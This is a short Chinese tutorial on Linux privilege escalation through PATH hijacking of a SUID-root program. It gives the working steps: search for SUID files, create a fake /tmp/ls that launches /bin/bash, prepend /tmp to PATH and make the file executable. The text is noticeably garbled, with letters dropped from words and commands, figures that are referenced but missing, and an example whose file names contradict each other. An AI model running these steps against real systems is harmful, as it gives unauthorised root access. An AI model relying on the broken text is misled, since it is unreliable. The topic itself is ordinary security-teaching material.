环境变量劫持提权

在Shll输入命令时，Shel会按PAH环境变量中的路径依次搜索命令，若是存在同名的命令，则执行最先找到的，若是PATH中加入了当前目录，也就是“”这个符号，则可能会被黑客利用，例如在“mp”目录下黑客新建了一个恶意文件ls”,若root用户在“tmp”目录下运行ls”命令时，那么将会运行黑客创建的恶意文件。 下面通过实例来看一下在其他场景中如何利用环境变量劫持提权。 运行“find/-user root-perm-4000-exec Is-ldb{}”命令查找设置了SUID的文件，如图5-43所示，发现“temp”目录下有个“test”文件设置了SUID,并且发现具有执行权限，这个文件比较可疑。

利用具有SUID权限的/home/user5/script文件

文件设置了suid位

查看script文件

执行该文件试试：发现执行了一个ls命令

echo "/bin/bash" > /tmp/ls

export PATH=/tmp:$PATH

echo $PATH

PS:export把变量输出为全局环境变量

发现根目录在前面

更改权限 chmod 755 /tmp/ls

在She11输入命令时，She11会按PATH环境变量中的路径依次搜索命令，若是存在同名的命令，则执行最先找到的，若是PATH中加入了当前目录，也就是".”这个符号，则可能会被黑客利用